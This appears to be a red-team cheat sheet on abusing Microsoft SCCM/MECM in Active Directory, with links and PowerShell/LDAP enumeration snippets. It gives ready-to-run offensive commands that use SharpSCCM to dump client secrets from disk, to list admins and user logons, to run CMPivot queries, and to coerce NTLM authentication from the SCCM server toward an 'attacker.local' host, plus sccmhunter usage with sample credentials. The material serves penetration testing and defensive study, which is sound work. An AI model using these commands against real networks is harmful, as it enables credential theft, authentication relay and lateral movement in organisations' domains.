# SCCM Abuse

* <https://www.thehacker.recipes/ad/movement/sccm-mecm>
* <https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a>
* <https://www.hub.trimarcsecurity.com/post/push-comes-to-shove-exploring-the-attack-surface-of-sccm-client-push-accounts>
* <https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/>
* <https://http418infosec.com/offensive-sccm-summary>
* <https://logan-goins.com/2025-04-25-sccm/>

{% embed url="https://github.com/subat0mik/Misconfiguration-Manager/blob/main/README.md#sccm-attack-matrix" %}

## Enumeration

Look for CcmExec.exe processes:

```
Cmd > tasklist | findstr CcmExec
```

Search for SCCM servers in LDAP:

```
PV3 > Get-DomainComputer -LDAPFilter "(&(objectClass=computer)(cn=*sccm*))" | select -ExpandProperty dnsHostName
PV3 > Get-DomainComputer | ? {$_.Name -like "*sccm*"} | select -ExpandProperty dnsHostName
```
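The `cn=*sccm*` filter only finds hosts that are named after the product. Site systems also publish themselves in Active Directory: each management point registers an `mSSMSManagementPoint` object under the `System Management` container once the schema has been extended for Configuration Manager. The following added example (not from the page or from any of the tools it links) lists those objects with plain ADSI, without PowerView, and reads the assigned site and management point from a managed client's `root\ccm` namespace; it assumes the container exists and is readable by the current user.

```powershell
# Added example, not from the page or the tools it links.
# 1) Site systems published in AD: every management point registers an
#    mSSMSManagementPoint object under CN=System Management,CN=System,<domain>.
$dn   = ([ADSI]"LDAP://RootDSE").defaultNamingContext
$base = [ADSI]"LDAP://CN=System Management,CN=System,$dn"
$s = New-Object System.DirectoryServices.DirectorySearcher($base)
$s.Filter = "(objectClass=mSSMSManagementPoint)"
[void]$s.PropertiesToLoad.AddRange(@("mSSMSMPName", "mSSMSSiteCode", "dNSHostName"))
$s.FindAll() | ForEach-Object {
    # DirectorySearcher lower-cases property names in its result collection
    [pscustomobject]@{
        SiteCode = $_.Properties["mssmssitecode"][0]
        MPName   = $_.Properties["mssmsmpname"][0]
        DnsHost  = $_.Properties["dnshostname"][0]
    }
}

# 2) On a managed client (CcmExec.exe running), the assigned site code and the
#    management point the client talks to live in root\ccm; Name is "SMS:<code>".
Get-CimInstance -Namespace root\ccm -ClassName SMS_Authority |
    Select-Object Name, CurrentManagementPoint
```

Comparing the first list against the hosts found by name shows which site systems an `*sccm*` search would have missed.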

## VNC-like Remote Control (CmRcViewer Abuse)

* <https://www.netero1010-securitylab.com/red-team/abuse-sccm-remote-control-as-native-vnc>
* <https://github.com/netero1010/SCCMVNC>

## Tools

### MalSCCM

* <https://labs.nettitude.com/blog/introducing-malsccm/>
* <https://github.com/nettitude/MalSCCM>

### sccmwtf

* <https://blog.xpnsec.com/unobfuscating-network-access-accounts/>
* <https://github.com/xpn/sccmwtf>

### SharpSCCM

* <https://github.com/Mayyhem/SharpSCCM>
* <https://www.guidepointsecurity.com/blog/sccm-exploitation-evading-defenses-and-moving-laterally-with-sccm-application-deployment/>

Get the SMS Provider / management point (SMS, from the legacy Systems Management Server name) and the site code (SC) used by the commands below:

```
Cmd > SharpSCCM.exe local site-info
```

List SCCM admins:

```
Cmd > SharpSCCM.exe get admins -sms <SMS> -sc <SC>
```

List user latest logons (automated in [sccmhound](https://github.com/CrowdStrike/sccmhound)):

```
Cmd > SharpSCCM.exe get class-instances -sms <SMS> -sc <SC> SMS_R_System -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -w "LastLogonUserName LIKE '%snovvcrash%'"
Cmd > SharpSCCM.exe get devices -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -u snovvcrash@megacorp.local
```

Get the resource ID of a device (e.g., a server) by its name:

```
Cmd > SharpSCCM.exe get resource-id -sms <SMS> -sc <SC> -d <RESOURCE>
```

Run a CMPivot query against a resource through the AdminService (REST API):

```
Cmd > SharpSCCM.exe invoke admin-service -sms <SMS> -sc <SC> -q "EventLog('Security',4h) | where EventID == 4624 | order by DateTime desc" -r <ID>
```

Grab secrets from SCCM client (locally):

```
Cmd > SharpSCCM.exe local secrets -m disk
```

Coerce authentication from SCCM server (remotely):

```
Cmd > SharpSCCM.exe invoke client-push -t attacker.local
```

### sccmhunter

* <https://github.com/garrettfoster13/sccmhunter/wiki>

Install:

```
$ pipx install -f "git+https://github.com/garrettfoster13/sccmhunter.git"
```

List user latest logons:

```
$ sccmhunter.py admin -u sccm_admin -p 'Passw0rd!' -ip SCCM.megacorp.local
$ get_lastlogon administrator
```
